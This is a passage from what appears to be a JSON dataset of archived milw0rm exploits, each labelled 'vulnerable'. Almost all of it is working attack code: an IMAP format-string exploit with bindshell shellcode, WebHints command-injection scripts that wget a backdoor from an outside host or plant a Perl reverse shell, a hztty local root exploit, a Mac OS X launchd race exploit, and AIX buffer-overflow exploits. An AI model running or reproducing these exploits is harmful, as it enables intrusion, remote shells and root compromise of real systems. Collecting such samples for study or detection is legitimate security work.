$0x80\n\n\"\\x87\\xd9\"                      //  xchg  %ebx,%ecx\n\n\"\\x93\"                          //  xchg  %eax,%ebx\n\n\"\\x49\"                          //  dec    %ecx\n\n\"\\x31\\xc0\"                      //  xor    %eax,%eax\n\n\"\\x49\"                          //  dec    %ecx\n\n\"\\xb0\\x3f\"                      //  mov    $0x3f,%al\n\n\"\\xcd\\x80\"                      //  int    $0x80\n\n\"\\x41\"                          //  inc    %ecx\n\n\"\\xe2\\xf8\"                      //  loop  8048469 <blah>\n\n\"\\x52\"                          //  push  %edx\n\n\"\\x68\\x6e\\x2f\\x73\\x68\"    //  push  $0x68732f6e\n\n\"\\x68\\x2f\\x2f\\x62\\x69\"    //  push  $0x69622f2f\n\n\"\\x89\\xe3\"                //  mov    %esp,%ebx\n\n\"\\x52\"                    //  push  %edx\n\n\"\\x53\"                    //  push  %ebx\n\n\"\\x89\\xe1\"                //  mov    %esp,%ecx\n\n\"\\xb0\\x0b\"                //  mov    $0xb,%al\n\n\"\\xcd\\x80\"                //  int    $0x80\n\n;\n\n\n\n\n\n/********************************\\\n\n|****** handle remoteshell ******|\n\n\\********************************/\n\n\n\nint handleshell(int peersh)\n\n{\n\nfd_set fds;\n\nchar buff[2048];\n\nint ret, cntr = 1;\n\n\n\nprintf(\" |- enjoy your stay and come back soon ;>\\n\");\n\n\n\nwrite(peersh, \"unset HISTFILE;id;uname -a;\\n\", 30);\n\n\n\nwhile(ret && cntr)\n\n     {\n\n      FD_ZERO(&fds);\n\n      FD_SET(0, &fds);\n\n      FD_SET(peersh, &fds);\n\n      ret = select(peersh+1, &fds, 0, 0, 0);\n\n      if(ret) \n\n        {\n\n         memset(buff, 0x0, sizeof(buff));\n\n         if(FD_ISSET(peersh, &fds)) \n\n           {\n\n            cntr = read(peersh, buff, sizeof(buff)-1); \n\n            printf(\"%s\", buff);\n\n            fflush(stdout);\n\n            }\n\n         if(FD_ISSET(0, &fds)) \n\n           {\n\n            cntr = read(0, buff, sizeof(buff)-1);\n\n            write(peersh, buff, strlen(buff));\n\n           }\n\n        }\n\n     }  \n\n return 1;\n\n}\n\n\n\n\n\n\n\n\n\n\n\n/********************************\\\n\n|********* HELP OUTPUT **********|\n\n\\********************************/\n\n\n\nvoid help()\n\n{\n\n\n\nprintf(\" `- usage: gun-imapd -p 143 -t www.exploits.cx  \\n\");                \n\nexit(0);\n\n}\n\n\n\n\n\n\n\n/********************************\\\n\n|******* CONNECT FUNC  **********|\n\n\\********************************/\n\n\n\n\n\nint connectme(char* ip, unsigned short port)\n\n{\n\nint soquet;\n\nstruct sockaddr_in  remoteaddr_in;\n\nstruct hostent*     hostip;\n\n\n\nmemset(&remoteaddr_in, 0x0, sizeof(remoteaddr_in));\n\nif ((hostip = gethostbyname(ip)) == NULL)\n\n   {\n\n     printf(\" |- could not resolve [%s]\\n\", ip);\n\n     exit(-1);\n\n   }\n\n\n\nremoteaddr_in.sin_family = AF_INET;\n\nremoteaddr_in.sin_port   = htons(port);\n\nremoteaddr_in.sin_addr   = *((struct in_addr *)hostip->h_addr);\n\n\n\nif ((soquet = socket(AF_INET, SOCK_STREAM, 0)) < 0)\n\n    {\n\n     printf(\" |- got no socket!\\n\");\n\n     exit(-1);\n\n    }\n\n\n\nprintf(\" |- try connecting to [%s:%d] ...\", ip, port);\n\n\n\nif (connect(soquet, (struct sockaddr *)&remoteaddr_in, sizeof(struct sockaddr)) ==  -1)\n\n   {\n\n    printf(\" no connection, exiting!\\n\");\n\n    exit(-1);\n\n   }\n\n\n\nprintf(\" successfull!\\n\");\n\nreturn(soquet);\n\n}\n\n\n\n\n\n/********************************\\\n\n|********* DO SPLOIT ************|\n\n\\********************************/\n\n\n\nint do_sploit(int soquet)\n\n{\n\nchar buff[1024], *addr = 0;\n\nint cntr = 0, *ptr, scaddr, gotaddr = GOT;\n\nunsigned int w1, w2 ,w3;\n\n\n\n//find heap with our shellcode: !experimental!\n\nmemset(buff, 0x00, sizeof(buff));\n\nmemset(buff, 0x41, 496);\n\nstrcat(buff, \"111122223333%p%p%p%p[%p-%p]\\r\\n\");\n\n\n\nif(write(soquet, buff, strlen(buff)) == -1)\n\n  {\n\n   printf(\" |- could not send packet!\\n\");\n\n   return -1;\n\n  }\n\nmemset(buff, 0x00, sizeof(buff));\n\nread(soquet, buff, sizeof(buff)-1);\n\naddr = strstr(buff, \"[\");\n\nif(addr > 0) \n\n  { \n\n   scaddr = strtoul(++addr, 0, 0) + 0x330;//the next chunk..\n\n   printf(\" |- using %p\\n\", scaddr);\n\n     } \n\nelse printf(\" |- !could not determine heap address..\\n!\"); \n\n//k build exploit now:\n\n\n\n w3 = ( scaddr & 0xffff0000 ) >> 16;\n\n w1 = ( scaddr & 0x0000ffff );\n\n\n\n\n\nmemset(buff, 0x00, sizeof(buff));\n\nmemset(buff, 0x41, 496);\n\nmemcpy(buff+400, bindshell, strlen(bindshell));\n\ncntr = strlen(buff) + 3*4;\n\n\n\n\n\nptr = (int *)gotaddr;\n\nmemcpy((buff+496), &ptr,4);\n\nptr = (int *)gotaddr;\n\nmemcpy((buff+500), &ptr,4);\n\nptr = (int *)(gotaddr+2);\n\nmemcpy((buff+504), &ptr,4);\n\nw1 -= cntr; \n\nw3 += (0x10000 - w1) - cntr;\n\nsprintf(buff+508, \"%%%dp%%n%%%dp%%n \\r\\n\", w1, w3);\n\n\n\nif(write(soquet, buff, strlen(buff)) == -1)\n\n  {\n\n   printf(\" |- could not send packet!\\n\");\n\n   return -1;\n\n  }\n\n//memset(buff, 0x00, sizeof(buff));\n\n//read(soquet, buff, sizeof(buff));\n\n\n\n\n\nreturn 1;\n\n}\n\n\n\n/********************************\\\n\n|************* MAIN *************|\n\n\\********************************/\n\n\n\nint main(int argc, char *argv[])\n\n{\n\nint tmp, socke, port = 143;\n\nchar *target = 0;\n\nchar banner[32];\n\n\n\nprintf(\" . gun-imapd v0.1 by qobaiashi\\n |\\n\");\n\nmemset(banner, 0x00, sizeof(banner));\n\n\n\nwhile((tmp = getopt(argc, argv, \"p:t:h\")) != EOF)\n\n     {\n\n      switch (tmp)\n\n             { \n\n              case 'p':  \n\n                         port = atoi(optarg);\n\n                         printf(\" |- using port: %d\\n\", port);\n\n                         break;\n\n\n\n              case 't':  \n\n                         target = optarg;\n\n                         printf(\" |- target host is: %s\\n\", optarg);\n\n                         break;\n\n\n\n              case 'h':  help();\n\n              }      \n\n\n\n      }\n\nif (target == NULL) help();\n\nsocke = connectme(target, port);\n\n\n\nif (read(socke, banner, sizeof(banner)) > -1)\n\n   {\n\n    printf(\" |- remote host is a %s\", (banner+4));\n\n   } \n\n\n\ndo_sploit(socke);\n\nsleep(1);\n\ntmp = connectme(target, 4096);\n\nhandleshell(tmp);\n\n\n\nclose(tmp);\n\nclose(socke);\n\n}\n\n\n\n// milw0rm.com [2005-06-10]",
220        "vulnerable": true
221    },
222    {
223        "exploit_id": 1039,
224        "content": "# This exploit uses a backdoor that isn't located on this server.\n\n# $cmde = \"cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt\";\n\n# change for your own needs. /str0ke\n\n\n\n#!/usr/bin/perl\n\n######################################################################################\n\n#        T r a p - S e t   U n d e r g r o u n d   H a c k i n g   T e a m           #\n\n######################################################################################\n\n#  EXPLOIT FOR: WebHints Remote C0mmand Execution Vuln                               #\n\n#                                                                                    #\n\n#Expl0it By: A l p h a _ P r o g r a m m e r (Sirus-v)                               #\n\n#Email: Alpha_Programmer@Yahoo.Com                                                   #\n\n#                                                                                    #\n\n#This Xpl Run a backdo0r in Server With 4444 Port.                                   #\n\n#Advisory: http://www.securityfocus.com/archive/1/401940/30/0/threaded               #\n\n######################################################################################\n\n# GR33tz T0 ==>     mh_p0rtal  --  oil_Karchack  --  The-CephaleX  -- Str0ke         #\n\n#And Iranian Security & Technical Sites:                                             #\n\n#                                                                                    #\n\n#         TechnoTux.Com , IranTux.Com , Iranlinux.ORG , Barnamenevis.ORG             #\n\n#      Crouz ,  Simorgh-ev   , IHSsecurity , AlphaST , Shabgard &  GrayHatz.NeT      #\n\n######################################################################################\n\n\n\nuse IO::Socket;\n\n\n\nif (@ARGV < 2)\n\n{\n\n print \"\\n==============================================\\n\";\n\n print \" \\n    WebHints Exploit By Alpha_Programmer \\n\\n\";\n\n print \"      Trap-Set Underground Hacking Team      \\n\\n\";\n\n print \"            Usage: <T4rg3t> <Dir>      \\n\\n\";\n\n print \"==============================================\\n\\n\";\n\n print \"Examples:\\n\\n\";\n\n print \"    Webhints.pl www.Host.com /cgi-bin/ \\n\";\n\n exit();\n\n}\n\n\n\n\n\n$serv = $ARGV[0];\n\n$serv =~ s/http:\\/\\///ge;\n\n\n\n$dir = $ARGV[1];\n\n\n\n$cmde = \"cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt\";\n\n$cmde2 = \"cd /tmp;cp alpha.txt alpha.pl;chmod 777 alpha.pl;perl alpha.pl\";\n\n\n\n$req = \"GET $dir\";\n\n$req .= \"hints.pl?|$cmde| HTTP/1.0\\n\\n\\n\\n\";\n\n\n\n$sock = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$serv\", PeerPort=>80) or die \" (-) - C4n't C0nn3ct To The S3rver\\n\";\n\n\n\nprint $sock $req;\n\nprint \"\\nPlease Wait ...\\n\\n\";\n\nsleep(3000);\n\nclose($sock);\n\n\n\n$sock2 = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>\"$serv\", PeerPort=>80) or die \" (-) - C4n't C0nn3ct To The S3rver\\n\";\n\n\n\n\n\n$req2 = \"GET $dir\";\n\n$req2 .= \"hints.pl?|$cmde2| HTTP/1.0\\n\\n\\n\\n\";\n\n\n\nprint $sock2 $req2;\n\n\n\nsleep(100);\n\n\n\nprint \"\\n\\n$$$   OK -- Now Try: Nc -v www.Site.com 4444   $$$\\n\";\n\nprint \"$$  if This Port was Close , This mean is That , You Haven't Permission to Write in /TMP  $$\\n\";\n\nprint \"Enjoy ;)\";\n\n### EOF ###\n\n\n\n# milw0rm.com [2005-06-11]",
225        "vulnerable": true
226    },
227    {
228        "exploit_id": 104,
229        "content": "/*  0x333hztty => hztty 2.0 local root exploit\n\n *\n\n *\n\n *\tmore info : Debian Security Advisory DSA 385-1\n\n *\n\n *\t*note* I adjusted some part of hztty's code since\n\n *\tthere were some errors. hope this will not influence\n\n *\texploitation :> tested against Red Hat 9.0 :\n\n *\n\n * [c0wboy@0x333 c0wboy]$ gcc 0x333hztty.c -o k\n\n * [c0wboy@0x333 c0wboy]$ ./k\n\n *\n\n *  ---  local root exploit for hztty 2.0  ---\n\n *  ---  coded by c0wboy ~ 0x33  ---\n\n * \n\n * sh-2.05b# [./hztty started]  [using /dev/ttyp6]\n\n * sh-2.05b$ sh-2.05b# uid=0(root) gid=0(root) groups=500(c0wboy)\n\n * sh-2.05b#\n\n *\n\n *  coded by c0wboy \n\n *\n\n *  (c) 0x333 Outsiders Security Labs\n\n *\n\n */\n\n\n\n#include <stdio.h>\n\n#include <unistd.h>\n\n\n\n#define BIN    \"./hztty\"\n\n#define SIZE   272\n\n\n\n\n\nunsigned char shellcode[] =\n\n\t\"\\x31\\xdb\\x89\\xd8\\xb0\\x17\\xcd\\x80\\x31\\xdb\\x89\\xd8\"\n\n\t\"\\xb0\\x2e\\xcd\\x80\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\"\n\n\t\"\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\x31\"\n\n\t\"\\xd2\\xb0\\x0b\\xcd\\x80\" ;\n\n\n\nint main()\n\n{\n\n\tint i;\n\n\tchar out[SIZE];\n\n\tchar *own[] = { shellcode, 0x0 };\n\n\n\n\tint *hztty = (int *)(out);\n\n\tint ret = 0xbffffffa - strlen(BIN) - strlen(shellcode);\n\n\n\n\tfor (i=0 ; i<SIZE-1 ; i+=4)\n\n\t\t*hztty++ = ret;\n\n\n\n\thztty = 0x0;\n\n\n\n\tfprintf (stdout, \"\\n ---  local root exploit for hztty 2.0  ---\\n\");\n\n\tfprintf (stdout, \" ---  coded by c0wboy ~ www.0x333.org   ---\\n\\n\");\n\n\n\n\texecle (BIN, BIN, \"-I\", out, 0x0, own, 0x0);\n\n}\n\n\n\n\n\n// milw0rm.com [2003-09-21]",
230        "vulnerable": true
231    },
232    {
233        "exploit_id": 1040,
234        "content": "/*\n\n**************************************************************************************\n\n*        T r a p - S e t   U n d e r g r o u n d   H a c k i n g   T e a m           *\n\n**************************************************************************************\n\n EXPLOIT FOR :  WebHints Remote C0mmand Execution Vuln\n\n\n\nCoded By: A l p h a _ P r o g r a m m e r  (Sirus-v)\n\nE-Mail: Alpha_Programmer@Yahoo.Com\n\n\n\nThis Xpl Upload a Page in Vulnerable Directory , You can Change This Code For Yourself\n\n\n\n**************************************************************************************\n\n* GR33tz T0 ==>     mh_p0rtal  --  oil_Karchack  --  The-CephaleX  -- Str0ke         *\n\n*And Iranian Security & Technical Sites:                                             *\n\n*                                                                                    *\n\n*         TechnoTux.Com , IranTux.Com , Iranlinux.ORG , Barnamenevis.ORG             *\n\n*      Crouz ,  Simorgh-ev   , IHSsecurity , AlphaST , Shabgard &  GrayHatz.NeT      *\n\n**************************************************************************************\n\n*/\n\n#include <string.h>\n\n#include <stdlib.h>\n\n#include <stdio.h>\n\n#pragma comment(lib, \"ws2_32.lib\")\n\n#include <winsock2.h>\n\n\n\n\n\n#define MY_PORT 80\n\n#define BUF_LEN 256\n\n/**************************************************************************************/\n\nint main(int arg_c, char *arg_v[])\n\n{\n\n       static const char cmd[] = \"GET %chints.pl?|wget %c| HTTP/1.0\\r\\n\\r\\n\" , arg_v[2] , arg_v[3];\n\n\n\n       struct sockaddr_in their_adr;\n\n       char buf[BUF_LEN];\n\n       struct hostent *he;\n\n       int sock, i;\n\n       WSADATA wsdata;\n\n\n\n/* Winsock start up */\n\n       WSAStartup(0x0101, &wsdata);\n\n       atexit((void (*)(void))WSACleanup);\n\n\n\n       if(arg_c != 3)\n\n       {\n\n               printf(\"=========================================================\\n\");\n\n               printf(\"  Webhints Exploit By Alpha_Programmer\\n\");\n\n               printf(\"   Trap-set Underground Hacking Team\\n\");\n\n               printf(\"   Usage : webhints.exe [Targ3t] [DIR] [File Address]\\n\");\n\n               printf(\"=========================================================\\n\");\n\n               return 1;\n\n       }\n\n/* create socket */\n\nprintf(\"calling socket()...\\n\");\n\n       sock = socket(AF_INET, SOCK_STREAM, 0);\n\n\n\n/* get IP address of other end */\n\nprintf(\"calling gethostbyname()...\\n\");\n\n       he = gethostbyname(arg_v[1]);\n\n       if(he == NULL)\n\n       {\n\n               printf(\"can't get IP address of host '%s'\\n\", arg_v[1]);\n\n               return 1;\n\n       }\n\n       memset(&their_adr, 0, sizeof(their_adr));\n\n       their_adr.sin_family = AF_INET;\n\n       memcpy(&their_adr.sin_addr, he->h_addr, he->h_length);\n\n       their_adr.sin_port = htons(MY_PORT);\n\n/* connect */\n\nprintf(\"C0nnecting...\\n\");\n\n       i = connect(sock, (struct sockaddr *)&their_adr, sizeof(their_adr));\n\n       if(i != 0)\n\n       {\n\n               printf(\"C0nnect() returned %d, errno=%d\\n\", i, errno);\n\n               return 1;\n\n       }\n\n/* send H3ll C0mmand */\n\nprintf(\"Sending H3ll Packets...\\n\");\n\n       i = send(sock, cmd, sizeof(cmd), 0);\n\n       if(i != sizeof(cmd))\n\n       {\n\n               printf(\"Send. returned %d, errno=%d\\n\", i, errno);\n\n               return 1;\n\n       }\\n\n\n               printf(\"OK ... Now You Can Test your file in hints.pl Directory\\n\"):\n\n\n\n       closesocket(sock);\n\n       return 0;\n\n}\n\n\n\n// milw0rm.com [2005-06-11]",
235        "vulnerable": true
236    },
237    {
238        "exploit_id": 1041,
239        "content": "#!/usr/bin/perl -w\n\n#\n\n#\n\n#emanuele@blackbox:~$ perl M4DR007-hints.pl\n\n#\n\n#\n\n# ~~ www.madroot.edu.ms Security Group ~~\n\n#\n\n# WebHints Software hints.cgi\n\n# Remote Command Execution Vulnerability\n\n# Affected version: <= all\n\n# ~~ code by MadSheep ~~\n\n#\n\n#\n\n# 06.11.2005\n\n#\n\n#\n\n#hostname:\n\n#localhost\n\n#port: (default: 80)\n\n#80\n\n#path: (/cgi-bin/)\n\n#/cgi-bin/\n\n#your ip (for reverse connect):\n\n#127.0.0.1\n\n#your port (for reverse connect):\n\n#7350\n\n#\n\n#\n\n#~~~~~~~~~~~~~~~~~~~~START~~~~~~~~~~~~~~~~~\n\n#[*] try to exploiting...\n\n#[*] OK!\n\n#[*] NOW, run in your box: nc -l -vv -p 7350\n\n#[*] starting connect back on 127.0.0.1 :7350\n\n#[*] DONE!\n\n#[*] Look netcat windows and funny\n\n#\n\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n# WARNING - WARNING - WARNING - WARNING\n\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n#\n\n#If connect back shell not found:\n\n#- you do not have privileges to write in /tmp\n\n#- Shell not vulnerable\n\n#\n\n#\n\n#We r: MadSheep - Punish3r - Spastic_eye - seth - Groove - Mrk\n\n#\n\n#\n\n#emanuele@blackbox:~$\n\n#\n\n#\n\n#emanuele@blackbox:~$ nc -l -vv -p 7350\n\n#\n\n# uid=1001(madhseep) gid=1001(madsheep) grupos=1001(madsheep)\n\n#\n\n#\n\n#\n\n# Come cheer us at #madroot on Freenode ( irc.freenode.net )\n\n#\n\n# (C) 2005 Copyright by madroot Security Group\n\n#\n\n#############################################\n\nuse IO::Socket;\n\n\n\nprint \"\\n\\n ~~ www.madroot.edu.ms Security Group ~~ \\n\\n\";\n\nprint \" WebHints Software hints.cgi\\n\";\n\nprint \" Remote Command Execution Vulnerability\\n\";\n\nprint \" Affected version: <= all \\n\";\n\nprint \" ~~ code by MadSheep ~~\\n\\n\\n\";\n\nprint \" 06.11.2005\\n\\n\\n\";\n\n\n\n\n\nprint \"hostname: \\n\";\n\nchomp($server=<STDIN>);\n\n\n\nprint \"port: (default: 80)\\n\";\n\nchomp($port=<STDIN>);\n\n$port=80 if ($port =~/\\D/ );\n\n$port=80 if ($port eq \"\" );\n\n\n\nprint \"path: (/cgi-bin/)\\n\";\n\nchomp($path=<STDIN>);\n\n\n\nprint \"your ip (for reverse connect): \\n\";\n\nchomp($ip=<STDIN>);\n\n\n\nprint \"your port (for reverse connect): \\n\";\n\nchomp($reverse=<STDIN>);\n\n\n\n\n\nprint \" \\n\\n\";\n\nprint \"~~~~~~~~~~~~~~~~~~~~START~~~~~~~~~~~~~~~~~\\r\\n\";\n\n\n\nprint \"[*] try to exploiting...\\n\";\n\n\n\n$string=\"/$path/hints.pl?|cd /tmp;echo \".q{use Socket;$execute= 'echo \"`uname -a`\";echo \"`id`\";/bin/sh';$target=$ARGV[0];$port=$ARGV[1];$iaddr=inet_aton($target) || die(\"Error: $!\\n\");$paddr=sockaddr_in($port, $iaddr) || die(\"Error: $!\\n\");$proto=getprotobyname('tcp');socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die(\"Error: $!\\n\");connect(SOCKET, $paddr) || die(\"Error: $!\\n\");open(STDIN, \">&SOCKET\");open(STDOUT, \">&SOCKET\");open(STDERR, \">&SOCKET\");system($execute);close(STDIN)}.\" >>cbs.pl;perl cbs.pl $ip $reverse|\";\n\n\n\nprint \"[*] OK! \\n\";\n\nprint \"[*] NOW, run in your box: nc -l -vv -p $reverse\\n\";\n\nprint \"[*] starting connect back on $ip :$reverse\\n\";\n\nprint \"[*] DONE!\\n\";\n\nprint \"[*] Look netcat windows and funny\\n\\n\";\n\n$socket=IO::Socket::INET->new( PeerAddr => $server, PeerPort => $port, Proto => tcp)\n\nor die;\n\n\n\n\n\nprint $socket \"POST $path HTTP/1.1\\n\";\n\nprint $socket \"Host: $server\\n\";\n\nprint $socket \"Accept: */*\\n\";\n\nprint $socket \"User-Agent: M4DR007\\n\";\n\nprint $socket \"Pragma: no-cache\\n\";\n\nprint $socket \"Cache-Control: no-cache\\n\";\n\nprint $socket \"Connection: close\\n\\n\";\n\n\n\nprint \"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\r\\n\";\n\nprint \" WARNING - WARNING - WARNING - WARNING   \\r\\n\";\n\nprint \"~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\r\\n\\n\";\n\nprint \"If connect back shell not found:\\n\";\n\nprint \"- you do not have privileges to write in /tmp\\n\";\n\nprint \"- Shell not vulnerable\\n\\n\\n\";\n\nprint \"We r: MadSheep - Punish3r - Spastic_eye - seth - Groove - Mrk\\n\\n\\n\";\n\n\n\n# milw0rm.com [2005-06-11]",
240        "vulnerable": true
241    },
242    {
243        "exploit_id": 1043,
244        "content": "/*\n\n *  Mac OS X 10.4 launchd race condition exploit\n\n *\n\n *  intropy (intropy <at> caughq.org)\n\n */\n\n\n\n/* .sh script to help with the offsets /str0ke\n\n#!/bin/bash\n\n\n\nX=1000\n\nY=3000\n\nI=1\n\n\n\nwhile ((1))\n\ndo\n\n    ./CAU-launchd /etc/passwd $X\n\n    if [ $I -lt 30 ]\n\n    then\n\n        ((X=$X+$Y))\n\n        ((I=$I+1))\n\n    else\n\n        X=1000\n\n        I=1\n\n    fi\n\ndone\n\n*/\n\n\n\n#include <stdio.h>\n\n#include <stdlib.h>\n\n#include <string.h>\n\n#include <unistd.h>\n\n#include <sys/types.h>\n\n#include <sys/stat.h>\n\n\n\n#define DEBUG 0\n\n#define SLEEP 6000\n\n\n\nmain(int argc, char *argv[])\n\n{\n\n    pid_t pid;\n\n    int count, sleep = SLEEP;\n\n    char name[100];    \n\n    char target[100];\n\n    struct stat *stats = (struct stat *)malloc(sizeof(struct stat));\n\n\n\n    if ( argc < 2) {\n\n        fprintf(stderr, \"%s <file to 0wn>\\n\", argv[0]);\n\n        exit(-1);\n\n    } else if ( argc > 2 ) {\n\n        sleep = atoi(argv[2]);\n\n        strncpy(target, argv[1], sizeof(target)-1);\n\n    } else {\n\n        strncpy(target, argv[1], sizeof(target)-1);\n\n    }\n\n\n\n    if ( DEBUG ) printf(\"Going for %s\\n\", target);\n\n    if ( DEBUG ) printf(\"Using usleep %d\\n\", sleep);\n\n\n\n    pid = fork();\n\n\n\n    if ( pid == 0 ) {\n\n        if ( DEBUG ) {\n\n            system(\"/sbin/launchd -v /bin/ls -R /var/launchd/ 2>/dev/null\");\n\n        } else {\n\n            system(\"/sbin/launchd -v /bin/ls -R /var/launchd/ >/dev/null 2>&1\");\n\n        }\n\n    } else {\n\n        snprintf(name, sizeof(name)-1, \"/var/launchd/%d.%d/sock\", getuid(), pid+2);\n\n        if ( DEBUG ) printf(\"Checking %s\\n\", name);\n\n        usleep(sleep);\n\n        if ( DEBUG ) printf(\"Removing sock...\\n\");\n\n        if ( (unlink(name)) != 0 ) {\n\n            if ( DEBUG ) perror(\"unlink\");\n\n        } else {\n\n            if ( (symlink(target, name)) != 0 ) {\n\n                if ( DEBUG ) perror(\"symlink\");\n\n            } else {\n\n                if ( DEBUG ) printf(\"Created symlink %s -> %s...\\n\", name, target);\n\n            }\n\n        }\n\n        stat(target, stats);\n\n        if ( stats->st_uid == getuid() ) {\n\n            printf(\"Looks like we got it\\n\");\n\n            usleep(10000000);\n\n        }\n\n    }\n\n}\n\n\n\n// milw0rm.com [2005-06-14]",
245        "vulnerable": true
246    },
247    {
248        "exploit_id": 1044,
249        "content": "/*\n\n *\n\n *    IBM AIX netpmon elevated privileges exploit\n\n *\n\n *    I just wanted to play with PowerPC (Tested on 5.2)\n\n *\n\n *    intropy (intropy <at> caughq.org)\n\n *\n\n */\n\n\n\n#include <stdio.h>\n\n#include <unistd.h>\n\n#include <stdlib.h>\n\n#include <string.h>\n\n\n\n#define DEBUG 1\n\n#define BUFFERSIZE 2048\n\n#define EGGSIZE 2048\n\n\n\n#define NOP 0x60\n\n#define ADDRESS 0x2ff22fff-(BUFFERSIZE/2)\n\n\n\nchar shellcode_binsh[] =\n\n\"\\x7c\\xa5\\x2a\\x79\"     /* xor.    r5,r5,r5             */\n\n\"\\x40\\x82\\xff\\xfd\"     /* bnel    <shellcode>          */\n\n\"\\x7f\\xe8\\x02\\xa6\"     /* mflr    r31                  */\n\n\"\\x3b\\xff\\x01\\x20\"     /* cal     r31,0x120(r31)       */\n\n\"\\x38\\x7f\\xff\\x08\"     /* cal     r3,-248(r31)         */\n\n\"\\x38\\x9f\\xff\\x10\"     /* cal     r4,-240(r31)         */\n\n\"\\x90\\x7f\\xff\\x10\"     /* st      r3,-240(r31)         */\n\n\"\\x90\\xbf\\xff\\x14\"     /* st      r5,-236(r31)         */\n\n\"\\x88\\x5f\\xff\\x0f\"     /* lbz     r2,-241(r31)         */\n\n\"\\x98\\xbf\\xff\\x0f\"     /* stb     r5,-241(r31)         */\n\n\"\\x4c\\xc6\\x33\\x42\"     /* crorc   cr6,cr6,cr6          */\n\n\"\\x44\\xff\\xff\\x02\"     /* svca                         */\n\n\"/bin/sh\"\n\n\"\\x05\";\n\n\n\nunsigned long cex_load_environment(char *env_buffer, char *address_buffer, char *payload, int environment_size, int buffer_size) {\n\n        int count, env_size = strlen(payload) + environment_size + 4 + 1;\n\n        unsigned long address, *ret_addressp;\n\n        \n\n        if (DEBUG) printf(\"Adding nops to environment buffer...\");\n\n        for ( count = 0; count < env_size - strlen(payload) - 1; count++ ) {\n\n            *(env_buffer++) = NOP;\n\n        }\n\n        if (DEBUG) printf(\"size %d...\\n\", count);\n\n        if (DEBUG) printf(\"Adding payload to environment buffer...\");\n\n        for ( count = 0; count < strlen(payload); count++ ) {\n\n            *(env_buffer++) = payload[count];\n\n        }\n\n        if (DEBUG) printf(\"size %d...\\n\", count);\n\n\n\n        env_buffer[env_size - 1] = '\\0';\n\n\n\n        memcpy(env_buffer, \"CAU=\", 4);\n\n\n\n\tmemset(address_buffer, 'A', buffer_size);\n\n\n\n        address = ADDRESS;\n\n\n\n        if (DEBUG) printf(\"Going for address @ 0x%lx\\n\", address);\n\n\n\n        if (DEBUG) printf(\"Adding return address to buffer...\");\n\n        ret_addressp = (unsigned long *)(address_buffer+3);\n\n        for ( count = 0; count < buffer_size; count += 4) {\n\n                *(ret_addressp++) = address;\n\n        }\n\n        if (DEBUG) printf(\"size %d...\\n\", count);\n\n\n\n        address_buffer[buffer_size - 1] = '\\0';\n\n\n\n        return( 0 );\n\n}\n\n\n\nint main()\n\n{\n\n    char *buffer, *egg;\n\n    char *args[3], *envs[2];\n\n\n\n    buffer = (char *)malloc(BUFFERSIZE);\n\n    egg = (char *)malloc(EGGSIZE);\n\n\n\n    cex_load_environment(egg, buffer, (char *)&shellcode_binsh, EGGSIZE, BUFFERSIZE);\n\n\n\n    args[0] = \"/usr/bin/netpmon\";\n\n    args[1] = \"-O\";\n\n    args[2] = buffer;\n\n    args[3] = NULL;\n\n\n\n    envs[0] = egg;\n\n    envs[1] = NULL;\n\n\n\n    execve( \"/usr/bin/netpmon\", args, envs );\n\n\n\n    return( 0 );\n\n}\n\n\n\n// milw0rm.com [2005-06-14]",
250        "vulnerable": true
251    },
252    {
253        "exploit_id": 1045,
254        "content": "/*\n\n *\n\n *    IBM AIX ipl_varyon elevated privileges exploit\n\n *\n\n *    I just wanted to play with PowerPC (Tested on 5.2)\n\n *\n\n *    intropy (intropy <at> caughq.org)\n\n *\n\n */\n\n\n\n#include <stdio.h>\n\n#include <unistd.h>\n\n#include <stdlib.h>\n\n#include <string.h>\n\n\n\n#define DEBUG 1\n\n#define BUFFERSIZE 2048\n\n#define EGGSIZE 2048\n\n\n\n#define NOP 0x60\n\n#define ADDRESS 0x2ff22fff-(BUFFERSIZE/2)\n\n\n\n/* lsd */\n\nchar shellcode_binsh[] =\n\n\"\\x7c\\xa5\\x2a\\x79\"     /* xor.    r5,r5,r5             */\n\n\"\\x40\\x82\\xff\\xfd\"     /* bnel    <shellcode>          */\n\n\"\\x7f\\xe8\\x02\\xa6\"     /* mflr    r31                  */\n\n\"\\x3b\\xff\\x01\\x20\"     /* cal     r31,0x120(r31)       */\n\n\"\\x38\\x7f\\xff\\x08\"     /* cal     r3,-248(r31)         */\n\n\"\\x38\\x9f\\xff\\x10\"     /* cal     r4,-240(r31)         */\n\n\"\\x90\\x7f\\xff\\x10\"     /* st      r3,-240(r31)         */\n\n\"\\x90\\xbf\\xff\\x14\"     /* st      r5,-236(r31)         */\n\n\"\\x88\\x5f\\xff\\x0f\"     /* lbz     r2,-241(r31)         */\n\n\"\\x98\\xbf\\xff\\x0f\"     /* stb     r5,-241(r31)         */\n\n\"\\x4c\\xc6\\x33\\x42\"     /* crorc   cr6,cr6,cr6          */\n\n\"\\x44\\xff\\xff\\x02\"     /* svca                         */\n\n\"/bin/sh\"\n\n\"\\x05\";\n\n\n\nunsigned long cex_load_environment(char *env_buffer, char *address_buffer, char *payload, int environment_size, int buffer_size) {\n\n        int count, env_size = strlen(payload) + environment_size + 4 + 1;\n\n        unsigned long address, *ret_addressp;\n\n        \n\n        if (DEBUG) printf(\"Adding nops to environment buffer...\");\n\n        for ( count = 0; count < env_size - strlen(payload) - 1; count++ ) {\n\n            *(env_buffer++) = NOP;\n\n        }\n\n        if (DEBUG) printf(\"size %d...\\n\", count);\n\n        if (DEBUG) printf(\"Adding payload to environment buffer...\");\n\n        for ( count = 0; count < strlen(payload); count++ ) {\n\n            *(env_buffer++) = payload[count];\n\n        }\n\n        if (DEBUG) printf(\"size %d...\\n\", count);\n\n\n\n        env_buffer[env_size - 1] = '\\0';\n\n\n\n        memcpy(env_buffer, \"CAU=\", 4);\n\n\n\n\tmemset(address_buffer, 'A', 